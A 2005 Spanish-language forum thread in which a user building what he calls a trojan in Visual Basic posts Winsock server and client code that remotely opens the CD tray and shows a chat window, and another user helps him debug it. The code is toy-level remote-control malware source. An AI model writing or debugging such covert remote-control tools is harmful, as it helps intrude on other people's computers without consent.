elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema en el codigo de visual basic.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema en el codigo de visual basic.  (Leído 2,693 veces)
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Problema en el codigo de visual basic.
« en: 13 Mayo 2005, 17:31 pm »

Hola, a ver si me explico bien:

Estoy creando un troyano en visual basic y tengo un problemilla:

Primero el codigo:

-----SERVER------
Código:
Option Explicit
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags&, ByVal dwReserved&)
Private Declare Function mciSendString Lib "winmm.dll" _
Alias "mciSendStringA" _
( _
ByVal lpstrCommand As String, _
ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, _
ByVal hwndCallback As Long _
) _
As Long
----------------------------------------------------------
Private Sub Winsock_server_DataArrival(ByVal bytesTotal As Long)
   Dim mensaje As String
Winsock_server.GetData mensaje
If mensaje = "OPENCD" Then Call mciSendString("set CDAudio door open", vbNullString, 127, 0)
If mensaje = "CLOSECD" Then Call mciSendString("set CDAudio door closed", vbNullString, 127, 0)

If mensaje = "OPENCHAT" Then
Form_chat.Show
End If
End Sub

--------CLIENT-------

Pantalla FUN
Código:
Private Sub Command_closecd_Click()
Dim mensaje As String
mensaje = "CLOSECD"
Form_menu.Winsock_menu.SendData mensaje
End Sub

Private Sub Command_opencd_Click()
Dim mensaje As String
mensaje = "OPENCD"
Form_menu.Winsock_menu.SendData mensaje
End Sub
Pantalla CHAT
Código:
Private Sub Command_enviar_Click()
Dim mensaje As String
mensaje = "OPENCHAT"
Form_menu.Winsock_menu.SendData mensaje
End sub

A ver, las dos funciones primeras de abrir y cerrar el cd funcionan correctamente.

Pero la de hacer visible la pantalla del chat no se muestra.
¿Podriais decirme que parte del codigo es la que e escrito mal?

Gracias de antemano.
Salu2


En línea

Cicklow


Desconectado Desconectado

Mensajes: 604


-=Cicklow SOFT®=-


Ver Perfil WWW
Re: Problema en el codigo de visual basic.
« Respuesta #1 en: 13 Mayo 2005, 18:20 pm »

Fijate de poner esto en el server:

Código:
Private Sub Winsock_server_DataArrival(ByVal bytesTotal As Long)
   Dim mensaje As String
Winsock_server.GetData mensaje

msgbox mensaje
'hace lo de prueva y error, fijate bien si ese comando llega.

If mensaje = "OPENCD" Then Call mciSendString("set CDAudio door open", vbNullString, 127, 0)
If mensaje = "CLOSECD" Then Call mciSendString("set CDAudio door closed", vbNullString, 127, 0)

If mensaje = "OPENCHAT" Then
Form_chat.Show
End If
End Sub


En línea

www.cicklow.com . Solo Soy Un Ciego que Ve El Sonido Del Silencio
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Problema en el codigo de visual basic.
« Respuesta #2 en: 14 Mayo 2005, 12:01 pm »

Muchas gracias, el problema ya esta solucionado.

Salu2
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Info] Codigo de Error de Visual Basic
Programación Visual Basic
agus0 7 17,651 Último mensaje 3 Febrero 2011, 14:28 pm
por agus0
El codigo de visual basic?
Programación Visual Basic
prometheus48 1 1,727 Último mensaje 9 Octubre 2011, 21:56 pm
por raul338
Ayuda con Codigo en Visual Basic 6.0
.NET (C#, VB.NET, ASP)
bsosa 1 1,952 Último mensaje 25 Enero 2012, 20:56 pm
por $Edu$
Necesito editar un EXE en visual basic o ver su codigo completo
Programación Visual Basic
Tacobros 3 2,660 Último mensaje 5 Octubre 2014, 20:23 pm
por MCKSys Argentina
Problema con codigo de visual basic
Programación Visual Basic
Izzyz 1 2,154 Último mensaje 14 Noviembre 2014, 19:34 pm
por DroppleX
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines